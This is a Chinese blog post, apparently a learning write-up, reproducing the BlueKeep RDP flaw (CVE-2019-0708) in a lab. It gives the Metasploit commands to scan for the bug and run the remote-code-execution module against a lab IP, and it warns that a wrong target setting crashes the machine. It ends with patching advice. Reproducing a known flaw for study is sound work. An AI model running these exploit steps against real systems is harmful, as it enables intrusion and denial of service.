远程桌面代码执行漏洞复现(CVE-2019-0708)

前言

最近在学习和复现漏洞,借此记录一下~~




目录导航


漏洞危害就不说了,你们都懂得,下面是漏洞的影响范围~~

CVE-2019-0708 漏洞影响范围:

Windows 7(已停止维护)
Windows Server 2008 R2
Windows Server 2008 Windows
Server 2003(已停止维护)
Windows XP(已停止维护)

漏洞复现环境:ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/



一. 漏洞探测

命令行输入msfconsole打开msf控制台,随后搜索cve-2019-0708漏洞利用模块,如下:

在这里插入图片描述

可以看到有auxiliary(辅助)模块和exploit(攻击)模块,而我们现在要使用的是模块一,用来进行对CVE-2019-0708的漏洞探测

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

在这里插入图片描述

扫描结果显示该主机很容易受到CVE-2019-0708的攻击,到此可进行下一步漏洞利用了。



二. 漏洞利用

接下来要使用rce漏洞利用模块,如不存在该模块,可尝试更新msf,如下:

msf更新:apt-get  install metasploit-framework
		gem install bundler

需要设置的options:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  # rce漏洞利用模块
show targets 
set target 4  # 选择目标主机类型  这里这里要选择正确的target 不然会导致受害机蓝屏!!
set rhost 172.20.60.14 # 这里设置受害机
run

经过前前后后10多次的尝试,测试期间换了多个镜像文件和msf环境,实验结果仍旧是蓝屏… ,并未达到rec利用,最后尝试使用下面的镜像环境能完成复现实验。

ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/

失败的样子:
在这里插入图片描述
成功的样子:在这里插入图片描述



修复建议

1.更新漏洞补丁
2.使用杀软等专业的防护软件系统,毕竟人力有限,总不可能24小时盯着个人电脑或关键服务器,这时候,杀软等防护硬软件将会是我们的第一道防线

猜你喜欢

转载自blog.csdn.net/chest_/article/details/106898107